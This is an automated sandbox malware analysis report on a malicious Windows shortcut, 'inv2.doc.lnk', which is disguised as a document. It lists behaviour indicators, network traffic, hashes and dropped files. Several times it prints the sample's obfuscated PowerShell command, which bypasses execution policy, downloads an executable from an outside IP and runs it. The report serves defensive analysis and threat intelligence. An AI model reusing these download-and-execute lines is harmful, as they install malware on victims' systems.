inv2.doc.lnk
This report is generated from a file or URL submitted to this webservice on November 16th 2016 11:48:39 (UTC) and action script Heavy Anti-Evasion
Guest System: Windows 7 32 bit, Home Premium, 6.1 (build 7601), Service Pack 1
Report generated by Falcon Sandbox v5.40 © Hybrid Analysis
Incident Response
Risk Assessment
- Persistence
  - Injects into explorer
- Fingerprint
  - Reads the active computer name
  - Reads the cryptographic machine GUID
  - Reads the Windows installation date
- Network Behavior
  - Contacts 1 domain and 1 host.
Indicators
Not all malicious and suspicious indicators are displayed.
Malicious Indicators 9

External Systems

Detected Emerging Threats Alert
- details
  - Detected alert "ET INFO Executable Download from dotted-quad Host" (SID: 2016141, Rev: 4, Severity: 1) categorized as "A Network Trojan was detected"
  - Detected alert "ET POLICY PE EXE or DLL Windows file download HTTP" (SID: 2018959, Rev: 2, Severity: 1) categorized as "Potential Corporate Privacy Violation"
- source
- Suricata Alerts
- relevance
- 10/10

Sample was identified as malicious by at least one Antivirus engine
- details
- 2/54 Antivirus vendors marked sample as malicious (3% detection rate)
- source
- External System
- relevance
- 8/10

General

Contains ability to start/interact with device drivers
- details
- DeviceIoControl@KERNEL32.DLL from cmd.exe (PID: 3804)
- source
- Hybrid Analysis Technology
- relevance
- 8/10

The analysis extracted a file that was identified as malicious
- details
  - 1/80 Antivirus vendors marked dropped file "System.dll" as malicious (classified as "W32.eHeur" with 1% detection rate)
  - 13/57 Antivirus vendors marked dropped file "Roaming.exE" as malicious (classified as "virus.win32.sality" with 22% detection rate)
- source
- Extracted File
- relevance
- 10/10

Installation/Persistence

Injects into explorer
- details
- Injected into "explorer.exe"
- source
- Monitored Target
- relevance
- 5/10

Network Related

Malicious artifacts seen in the context of a contacted host
- details
- Found malicious artifacts related to "46.30.43.107" (ASN: 35415, Owner: Webazilla B.V.): ...
- source
- Network Traffic
- relevance
- 10/10

Unusual Characteristics

Contains ability to reboot/shutdown the operating system
- details
- ExitWindowsEx@USER32.DLL from exE (PID: 3592)
- source
- Hybrid Analysis Technology
- relevance
- 5/10

Contains native function calls
- details
  - NtFsControlFile@NTDLL.DLL from cmd.exe (PID: 3804)
  - NtQueryInformationProcess@NTDLL.DLL from cmd.exe (PID: 3804)
  - NtOpenThreadToken@NTDLL.DLL from cmd.exe (PID: 3804)
  - NtQueryInformationToken@NTDLL.DLL from cmd.exe (PID: 3804)
- source
- Hybrid Analysis Technology
- relevance
- 5/10

Hiding 1 malicious indicator (available only in the private webservice or standalone version)

Suspicious Indicators 16

Anti-Detection/Stealthiness

Queries kernel debugger information
- details
- "exE" at 00022258-00003592-00000105-53501164
- source
- API Call
- relevance
- 6/10

Queries the internet cache settings (often used to hide footprints in index.dat or internet cache)
- details
- "explorer.exe" (Access type: "QUERYVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"; Key: "DISABLECACHINGOFSSLPAGES"; Value: "00000000040000000400000000000000")
- source
- Registry Access
- relevance
- 3/10

Environment Awareness

Reads the cryptographic machine GUID
- details
  - "powershell.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\CRYPTOGRAPHY"; Key: "MACHINEGUID")
  - "explorer.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\CRYPTOGRAPHY"; Key: "MACHINEGUID")
- source
- Registry Access
- relevance
- 10/10

Reads the Windows installation date
- details
- "powershell.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION"; Key: "INSTALLDATE")
- source
- Registry Access
- relevance
- 10/10

External Systems

Detected Emerging Threats Alert
- details
  - Detected alert "ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download" (SID: 2016538, Rev: 3, Severity: 2) categorized as "Potentially Bad Traffic"
  - Detected alert "ET INFO SUSPICIOUS Dotted Quad Host MZ Response" (SID: 2021076, Rev: 2, Severity: 2) categorized as "Potentially Bad Traffic"
- source
- Suricata Alerts
- relevance
- 10/10

General

Reads configuration files
- details
  - "exE" read file "%USERPROFILE%\Users\PSPUBWS\Desktop\desktop.ini"
  - "exE" read file "%USERPROFILE%\Searches\desktop.ini"
  - "exE" read file "%USERPROFILE%\Videos\desktop.ini"
  - "exE" read file "%USERPROFILE%\Pictures\desktop.ini"
  - "exE" read file "%USERPROFILE%\Contacts\desktop.ini"
  - "exE" read file "%USERPROFILE%\Favorites\desktop.ini"
  - "exE" read file "%USERPROFILE%\Music\desktop.ini"
  - "exE" read file "%USERPROFILE%\Downloads\desktop.ini"
  - "exE" read file "%USERPROFILE%\Documents\desktop.ini"
- source
- API Call
- relevance
- 4/10

Installation/Persistence

Drops executable files
- details
  - "System.dll" has type "PE32 executable (DLL) (GUI) Intel 80386 for MS Windows"
  - "Roaming.exE" has type "PE32 executable (GUI) Intel 80386 for MS Windows Nullsoft Installer self-extracting archive"
- source
- Extracted File
- relevance
- 10/10

Writes a PE file header to disc
- details
- "exE" wrote 11776 bytes starting with PE header signature to file "%TEMP%\nsf7D51.tmp\System.dll": 4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000e00000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...
- source
- API Call
- relevance
- 10/10

Network Related

Found potential IP address in binary/memory
- details
  - Heuristic match: "exEcUtIonPolICy bYpaSS -NoPrOFILe (NEW-objEcT systeM.NET.wEBclIEnT).DoWnLOadFile('http://46.30.43.107/gite.exe','%APPDATA%\exE');sTArt-PRoceSs %APPDATA%\exE"
  - Heuristic match: "P^o^W^er^Sh^e^ll.^exe -exEc^UtIonP^o^lI^Cy bYpaS^S -^NoPrOF^ILe (^N^E^W-ob^jEcT systeM.NET.wEB^clIE^nT).DoWnLO^a^d^Fil^e^('http://46.30.43.107/gite.exe','%APPDATA%\exE')^;^s^TA^r^t^-P^R^o^c^eSs^ %APPDATA%\exE"
  - "46.30.43.107"
  - Heuristic match: "6.1.7601.17514"
  - Heuristic match: "/c "P^o^W^er^Sh^e^ll.^exe -exEc^UtIonP^o^lI^Cy bYpaS^S -^NoPrOF^ILe (^N^E^W-ob^jEcT systeM.NET.wEB^clIE^nT).DoWnLO^a^d^Fil^e^('http://46.30.43.107/gite.exe','%APPDATA%\exE')^;^s^TA^r^t^-P^R^o^c^eSs^ %APPDATA%\exE""
  - Heuristic match: "PoWerShell.exe -exEcUtIonPolICy bYpaSS -NoPrOFILe (NEW-objEcT systeM.NET.wEBclIEnT).DoWnLOadFile('http://46.30.43.107/gite.exe','%APPDATA%\exE');sTArt-PRoceSs %APPDATA%\exE"
- source
- String
- relevance
- 3/10

Spyware/Information Retrieval

Contains ability to open the clipboard
- details
- OpenClipboard@USER32.DLL from exE (PID: 3592)
- source
- Hybrid Analysis Technology
- relevance
- 10/10

System Security

Modifies proxy settings
- details
  - "powershell.exe" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
  - "powershell.exe" (Access type: "DELETEVAL"; Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
  - "explorer.exe" (Access type: "SETVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"; Key: "PROXYENABLE"; Value: "00000000")
  - "explorer.exe" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"; Key: "PROXYSERVER")
  - "explorer.exe" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"; Key: "PROXYOVERRIDE")
  - "explorer.exe" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
  - "explorer.exe" (Access type: "DELETEVAL"; Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
- source
- Registry Access
- relevance
- 10/10

Queries sensitive IE security settings
- details
  - "powershell.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SECURITY"; Key: "DISABLESECURITYSETTINGSCHECK")
  - "explorer.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SECURITY"; Key: "DISABLESECURITYSETTINGSCHECK")
- source
- Registry Access
- relevance
- 8/10

Unusual Characteristics

Installs hooks/patches the running process
- details
  - "powershell.exe" wrote bytes "0857967604789f760000000051c1c5759498c575ee9cc57575dcc775273ec775efb2cb750000000046ce5f77013d607738ed6077cfcd5f7731235f77de2f6077c4ca5f7780bb5f7752ba5f779fbb5f7792bb5f7746ba5f770abf5f7700000000" to virtual address "0x6F011000" (part of module "SHFOLDER.DLL")
  - "powershell.exe" wrote bytes "f4f4ab70" to virtual address "0x6B1D1FDC" (part of module "MSCORWKS.DLL")
  - "powershell.exe" wrote bytes "7739807779a88477be728477d62d84771de27f7705a28477c868837757d18a77bee37f77616f8477684182770050827700000000ad37e5758b2de575b641e57500000000" to virtual address "0x75371000" (part of module "WSHIP6.DLL")
  - "powershell.exe" wrote bytes "92e67f7779a88477be728477d62d84771de27f7705a28477bee37f77616f8477684182770050827700000000ad37e5758b2de575b641e57500000000" to virtual address "0x74E51000" (part of module "WSHTCPIP.DLL")
  - "powershell.exe" wrote bytes "4053827758588377186a8377653c84770000000000bf5f770000000056cc5f77000000007cca5f77000000003768b6756a2c8477d62d8477000000002069b6750000000029a65f7700000000a48db67500000000f70e5f7700000000" to virtual address "0x75D01000" (part of module "NSI.DLL")
  - "exE" wrote bytes "4d376077f99c5f7778eb5e7718616177fa8b5e77d33360770e456077a41d6077d0d95f77e8d95f77013c6077e19c5f772b456077b62f607741235f7700bf5f77000000006d42747700000000ec227c7699e5797600000000" to virtual address "0x10003000" (part of module "SYSTEM.DLL")
  - "exE" wrote bytes "0857967604789f760000000051c1c5759498c575ee9cc57575dcc775273ec775efb2cb750000000046ce5f77013d607738ed6077cfcd5f7731235f77de2f6077c4ca5f7780bb5f7752ba5f779fbb5f7792bb5f7746ba5f770abf5f7700000000" to virtual address "0x6F021000" (part of module "SHFOLDER.DLL")
  - "exE" wrote bytes "c2000000" to virtual address "0x1000405C" (part of module "SYSTEM.DLL")
- source
- Hook Detection
- relevance
- 10/10

Reads information about supported languages
- details
- "cmd.exe" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000409")
- source
- Registry Access
- relevance
- 3/10

Hiding 2 suspicious indicators (available only in the private webservice or standalone version)

Informative 16

Anti-Reverse Engineering

Contains ability to register a top-level exception handler (often used as anti-debugging trick)
- details
- SetUnhandledExceptionFilter@KERNEL32.DLL from cmd.exe (PID: 3804)
- source
- Hybrid Analysis Technology
- relevance
- 1/10

Environment Awareness

Contains ability to query machine time
- details
  - GetSystemTime@KERNEL32.DLL from cmd.exe (PID: 3804) (3 calls)
  - GetSystemTimeAsFileTime@KERNEL32.DLL from cmd.exe (PID: 3804)
  - GetLocalTime@KERNEL32.DLL from cmd.exe (PID: 3804)
- source
- Hybrid Analysis Technology
- relevance
- 1/10

Contains ability to query the machine version
- details
  - GetVersion@KERNEL32.DLL from cmd.exe (PID: 3804)
  - GetVersion@KERNEL32.DLL from exE (PID: 3592)
- source
- Hybrid Analysis Technology
- relevance
- 1/10

Contains ability to query volume size
- details
  - GetDiskFreeSpaceExW@KERNEL32.DLL from cmd.exe (PID: 3804)
  - GetDiskFreeSpaceW@KERNEL32.DLL from exE (PID: 3592)
- source
- Hybrid Analysis Technology
- relevance
- 3/10

Makes a code branch decision directly after an API that is environment aware
- details
- Found API call GetLocalTime@KERNEL32.DLL (Target: "cmd.exe"; Stream UID: "00019473-00003804-28473-452-4A00C53D") which is directly followed by "cmp esi, ebx" and "jne 4A00C714h". See related instructions from cmd.exe (PID: 3804):
    ...
    +435 lea eax, dword ptr [ebp-00000264h]
    +441 push eax
    +442 call dword ptr [49FF1324h] ;GetLocalTime
    +448 lea eax, dword ptr [ebp-24h]
    +451 push eax
    +452 push edi
    +453 lea eax, dword ptr [ebp-00000264h]
    +459 push eax
    +460 cmp esi, ebx
    +462 jne 4A00C714h
    ...
- source
- Hybrid Analysis Technology
- relevance
- 10/10

Possibly tries to detect the presence of a debugger
- details
- GetProcessHeap@KERNEL32.DLL from cmd.exe (PID: 3804) (12 calls)
- source
- Hybrid Analysis Technology
- relevance
- 1/10

General

Contacts domains
- details
- "wimel.at"
- source
- Network Traffic
- relevance
- 1/10

Contacts server
- details
- "46.30.43.107:80"
- source
- Network Traffic
- relevance
- 1/10

Contains PDB pathways
- details
- "cmd.pdb"
- source
- String
- relevance
- 1/10

Creates mutants
- details
  - "\Sessions\1\BaseNamedObjects\RasPbFile"
  - "\Sessions\1\BaseNamedObjects\Global\.net clr networking"
  - "\Sessions\1\BaseNamedObjects\{C20CD437-BA6D-4ebb-B190-70B43DE3B0F3}"
  - "\Sessions\1\BaseNamedObjects\_SHuassist.mtx"
  - "\Sessions\1\BaseNamedObjects\Local\ZonesCounterMutex"
  - "\Sessions\1\BaseNamedObjects\Local\ZonesCacheCounterMutex"
  - "\Sessions\1\BaseNamedObjects\Local\ZoneAttributeCacheCounterMutex"
  - "\Sessions\1\BaseNamedObjects\Local\ZonesLockedCacheCounterMutex"
  - "\Sessions\1\BaseNamedObjects\Local\_!MSFTHISTORY!_"
  - "\Sessions\1\BaseNamedObjects\Local\c:!users!pspubws!appdata!roaming!microsoft!windows!cookies!"
  - "\Sessions\1\BaseNamedObjects\Local\c:!users!pspubws!appdata!local!microsoft!windows!history!history.ie5!"
  - "\Sessions\1\BaseNamedObjects\Local\WininetStartupMutex"
  - "\Sessions\1\BaseNamedObjects\Local\WininetConnectionMutex"
  - "\Sessions\1\BaseNamedObjects\Local\WininetProxyRegistryMutex"
  - "\Sessions\1\BaseNamedObjects\Local\c:!users!pspubws!appdata!local!microsoft!windows!temporary internet files!content.ie5!"
- source
- Created Mutant
- relevance
- 3/10

Drops files marked as clean
- details
- Antivirus vendors marked dropped file "unternehmen.jsp" as clean (type is "HTML document UTF-8 Unicode text with very long lines with CRLF LF line terminators")
- source
- Extracted File
- relevance
- 10/10

Loads the .NET runtime environment
- details
- "powershell.exe" loaded module "%WINDIR%\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll" at 6A6D0000
- source
- Loaded Module

Spawns new processes
- details
  - Spawned process "powershell.exe" with commandline "PoWerShell.exe -exEcUtIonPolICy bYpaSS -NoPrOFILe (NEW-objEcT systeM.NET.wEBclIEnT).DoWnLOadFile('http://46.30.43.107/gite.exe','%APPDATA%\exE');sTArt-PRoceSs %APPDATA%\exE"
  - Spawned process "exE"
  - Spawned process "explorer.exe"
- source
- Monitored Target
- relevance
- 3/10

Installation/Persistence

Dropped files
- details
  - "System.dll" has type "PE32 executable (DLL) (GUI) Intel 80386 for MS Windows"
  - "O2C5X4FOXJSAPSMSRUYH.temp" has type "data"
  - "ext.default.css" has type "ASCII text"
  - "unternehmen.jsp" has type "HTML document UTF-8 Unicode text with very long lines with CRLF LF line terminators"
  - "Roaming.exE" has type "PE32 executable (GUI) Intel 80386 for MS Windows Nullsoft Installer self-extracting archive"
  - "jquery.cycle2.tile.min.js" has type "ASCII text with very long lines with CRLF line terminators"
  - "ie179663103.css" has type "ASCII text"
  - "lang-en.js" has type "UTF-8 Unicode text"
  - "DK6uDL.QaY5YZv" has type "data"
- source
- Extracted File
- relevance
- 3/10

Touches files in the Windows directory
- details
- "cmd.exe" touched file "%WINDIR%\Globalization\Sorting\sortdefault.nls"
- source
- API Call
- relevance
- 7/10

Network Related

Found potential URL in binary/memory
- source
- String
- relevance
- 10/10

File Details
inv2.doc.lnk
- Filename
- inv2.doc.lnk
- Size
- 2.6KiB (2663 bytes)
- Type
- lnk
- Description
- MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon, Archive, ctime=Sat Nov 20 21:29:12 2010, mtime=Sat Nov 20 21:29:12 2010, atime=Sat Nov 20 21:29:12 2010, length=302592, window=hidenormalshowminimized
- Architecture
- WINDOWS
- SHA256
- 42afe1bfcf2ec48aa2fb293b637d8df2033504ec98fe5944167187f19899ddb4
- MD5
- 9d651569af586ad148be2df875acd0b7
- SHA1
- c454487e8765e4d8ccc463f8053d08a68cf8f812
Classification (TrID)
- 100.0% (.LNK) Windows Shortcut
Hybrid Analysis
Analysed 4 processes in total (System Resource Monitor).
- cmd.exe /c "P^o^W^er^Sh^e^ll.^exe -exEc^UtIonP^o^lI^Cy bYpaS^S -^NoPrOF^ILe (^N^E^W-ob^jEcT systeM.NET.wEB^clIE^nT).DoWnLO^a^d^Fil^e^('http://46.30.43.107/gite.exe','%APPDATA%\exE')^;^s^TA^r^t^-P^R^o^c^eSs^ %APPDATA%\exE" (PID: 3804)
- powershell.exe PoWerShell.exe -exEcUtIonPolICy bYpaSS -NoPrOFILe (NEW-objEcT systeM.NET.wEBclIEnT).DoWnLOadFile('http://46.30.43.107/gite.exe','%APPDATA%\exE');sTArt-PRoceSs %APPDATA%\exE (PID: 2612)
- exE (PID: 3592)
- explorer.exe (PID: 3276)

Network Analysis
Contacted Hosts
| IP Address | Port/Protocol | Associated Process | Details |
|---|---|---|---|
| 46.30.43.107 | 80/TCP | powershell.exe (PID: 2612) | Russian Federation, ASN: 35415 (Webazilla B.V.) |
Contacted Countries
- Russian Federation
HTTP Traffic
| Endpoint | Request | URL | Raw request |
|---|---|---|---|
| 46.30.43.107:80 | GET | 46.30.43.107/gite.exe | GET /gite.exe HTTP/1.1 Host: 46.30.43.107 Connection: Keep-Alive |
Memory Forensics
| String | Context | Stream UID |
|---|---|---|
| http://46.30.43.107/gite.exe','c | Domain/IP reference | 00019473-00003804-28473-125-49FF4C09 |
Suricata Alerts
| Event | Category | Description | SID |
|---|---|---|---|
| local -> 46.30.43.107:80 (TCP) | A Network Trojan was detected | ET INFO Executable Download from dotted-quad Host | 2016141 |
| 46.30.43.107 -> local:57235 (TCP) | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP | 2018959 |
| 46.30.43.107 -> local:57235 (TCP) | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download | 2016538 |
| 46.30.43.107 -> local:57235 (TCP) | Potentially Bad Traffic | ET INFO SUSPICIOUS Dotted Quad Host MZ Response | 2021076 |
Extracted Files
Malicious 2

Roaming.exE
- Size
- 211KiB (215649 bytes)
- Type
- PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
- AV Scan Result
- Labeled as "virus.win32.sality" (13/57)
- Runtime Process
- powershell.exe (PID: 2612)
- MD5
- 1ab0e4452a4feaa8c382cf2943023920
- SHA1
- 4a3103c29b54ddb4d83b0b2d2ad0846f4f275a92
- SHA256
- 2586f39b57bd74439b539abe51b686389526047c806f059413602767f98d864d

System.dll
- Size
- 12KiB (11776 bytes)
- Type
- PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
- AV Scan Result
- Labeled as "W32.eHeur" (1/80)
- Runtime Process
- exE (PID: 3592)
- MD5
- ca332bb753b0775d5e806e236ddcec55
- SHA1
- f35ef76592f20850baef2ebbd3c9a2cfb5ad8d8f
- SHA256
- df5ae79fa558dc7af244ec6e53939563b966e7dbd8867e114e928678dbd56e5d

Clean 1

unternehmen.jsp
- Size
- 13KiB (13141 bytes)
- Type
- HTML document, UTF-8 Unicode text, with very long lines, with CRLF, LF line terminators
- AV Scan Result
- 0/55
- Runtime Process
- exE (PID: 3592)
- MD5
- 112e359c8f4faff029f0c2485f87776b
- SHA1
- cc3789203b59f1a884985d6d8402ae4c34b13517
- SHA256
- ec835ef3b1d41058f56eb92c8887e993f9a5a0ad84ab6977bf5b3e14590adad9

Informative 6

O2C5X4FOXJSAPSMSRUYH.temp
- Size
- 7.8KiB (8016 bytes)
- Type
- data
- Runtime Process
- powershell.exe (PID: 2612)
- MD5
- 21f9969362bbc202df0cbd6c4a8e50c9
- SHA1
- 62bc816d70453da6839e5457749c42e182fbcb39
- SHA256
- 18f4142318b5be465f5bdf6d5910d673f533e76c10c3acb22820571881d3f30d

DK6uDL.QaY5YZv
- Size
- 71KiB (72487 bytes)
- Type
- data
- Runtime Process
- exE (PID: 3592)
- MD5
- dbaabb93f493426ddc8f11cd3b31edcc
- SHA1
- 6ecf83beeed303a0b2541a3df964354bdb57ae9b
- SHA256
- 55f134d02d953d0cbc5f014e768ebcb7fd7cff7050f3461de0755c4b082c6244

ext.default.css
- Size
- 5.9KiB (6068 bytes)
- Type
- ASCII text
- Runtime Process
- exE (PID: 3592)
- MD5
- 4680315c26479be48c58d7594310ce60
- SHA1
- 3e7868549a35780d7838047f3f5af3eddf81aea1
- SHA256
- 4cb2cd89886d1d11c90461c84533f230fa6d253562696c100a27d3c45681b55e

ie179663103.css
- Size
- 4.5KiB (4637 bytes)
- Type
- ASCII text
- Runtime Process
- exE (PID: 3592)
- MD5
- 58a2af1813aec98e3abfa061f6e41817
- SHA1
- f0e3732d5f2fc6ac13a13d49bf361ef1f4a2f8d6
- SHA256
- 64b6cea996e39510103edf47c1613a38238b6f46f7ff8a1b009e45e5362311ac

jquery.cycle2.tile.min.js
- Size
- 1.9KiB (1957 bytes)
- Type
- ASCII text, with very long lines, with CRLF line terminators
- Runtime Process
- exE (PID: 3592)
- MD5
- 5cbfd30b5cd26645861bbc1be2a3f910
- SHA1
- 1d90411b6467d94ad8c7782d4c22255959d33bfb
- SHA256
- c85b83d00c3730368ad004e6b28233c68f1de8cfcd3b4f0169c8ad206eb13327

lang-en.js
- Size
- 685B (685 bytes)
- Type
- UTF-8 Unicode text
- Runtime Process
- exE (PID: 3592)
- MD5
- c1ed5be339c4b8ef8b1a36942a5e40bc
- SHA1
- ee055c881a9d137d157fc61834c2e25ee1fb090c
- SHA256
- 967a7c6425de0d66d6bdf9be746724046b98720bebcb90bcddb96047d93c27ed